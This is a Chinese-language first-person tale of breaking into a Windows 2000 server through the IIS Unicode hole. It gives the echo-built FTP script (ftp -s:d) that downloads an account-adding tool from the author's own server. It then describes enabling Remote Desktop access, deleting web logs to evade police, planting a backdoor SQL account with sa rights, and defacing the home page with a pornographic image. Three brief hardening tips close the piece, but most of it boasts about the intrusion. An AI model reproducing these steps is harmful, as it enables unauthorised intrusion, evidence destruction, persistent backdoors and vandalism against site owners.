序言
如果说黑U漏洞的站有手气背的,大概都比不上我。
第一章
找到一台破机器,看着他开了21、80、135、139、1433、3389
心想蛮好破的,本来没什么兴趣,先用sql客户端连接,sa空密码试试。。。。
居然设置了密码,这个网管的智商可能大于40,呵呵,再看看U之类的喽。。。。
扫描结果显示有U,3389登录上去发现没有输入法漏洞,faint,我还真不知道这service pack怎么能打出这副样子出来,照说打了之后应该没有U漏洞啊。。。。
随便敲个dir+c:\tftp*+/s,等了半天(这机器很烂),居然没有,估计是被尼姆达搞得不行了,才出此烂招,f\*\*!!!
为了快一点,dir+c:\winnt\system32\ftp.exe,没有!!faint!!!
连这个都删??!!比我还变态。。。真没折了?那我的扫描记录留在那里多危险啊!!
靠,这么变态的网管,搞他没商量!!!
想了3秒种,得出了一个结论:
。。。。。。。。。。
其实FTP.exe是存在的~~,在哪里呢?
第二章
呣呣~~,他不是爱打services pack吗?凭他这么智障的网管,肯定忘记了在service pack有一个备份,微软为我们考虑得还挺周到啊,哈哈哈哈
吸取教训,直接整个硬盘查找,慢就慢点吧
dir c:\ftp.exe /s,果然在service pack下面有这个鸟文件,copy过来。。。
好了,echo open xxx.xxx.xxx.xxx >d 连接到我的ftp服务器(我不会告诉你的~~)
echo xxxxxx >>d 我的帐号,当然也不会告诉你
echo xxxxxx >>d 我的密码,你认为我会告诉你吗?
echo bin >>d 为什么?你们想想吧,反正加上不会遇到麻烦
echo get xxxxx >>d 方法太烂,不好意思告诉你,反正是可以用来加帐号的东西就行
echo bye >>d 礼貌一点,和我得FTP服务器说byebye
OK,
ftp -s:d
等着吧,一会儿功夫,报告cgi error,不管他,dir。。。。
shit !!!没有传过来,难道我的服务器....????
连接上我的服务器看看,一切正常啊,
type d ,也很正常啊,怎么回事情?
ping 目标,发现速度奇慢,我大概知道怎么回事情了!!!
改写d!!!
echo open xxxxx >d
echo asdfasdf >>d
echo adsfasdf >>d
echo user xxxxx >>d
echo xxxxx >>d
echo bin >>d
echo get xxxx >>d
echo bye >>d
OK
ftp -s:d
这次好了,原因不明
连接进去,加帐号,然后3389进去。。。。
第三章
忽然说我这个帐号无权登录,faint!!! 黑个破站怎么这么烦??!!
改terminal services登录帐户限制
在我的机器上点击“我的电脑”-》管理-》\\xxx.xxx.xxx.xxx-》确定(谁会按取消啊,真是。。。)
等了半个世纪左右,出来了服务列表,修改terminal services“属性”,登录帐户修改为“本机上的帐户”,重新启动terminalservices 服务,退出
再从3389登录进去,TMD,总算看到win2000的桌面了。
后记
停掉WWW服务,冲到c:\winnt\system32\logfiles下删w3svc日志,
在sql server里放个帐号,当然权限了sa一致,以后不爽了还能进来逛逛。。。。。
哇哈哈,不怕警察叔叔来找我喽~~!!
顺手改掉他那难看的index.html,放个黄色图片吧,凭那位网管的智商,大概也就看得懂这些了。。。
总结:
1)如果漏洞补丁没打全,那么就不要开这个服务;
2)删除文件时要考虑到备份文件是否存在;
3)端口能少开就少开,少开一点不会死,开多了死得难看。
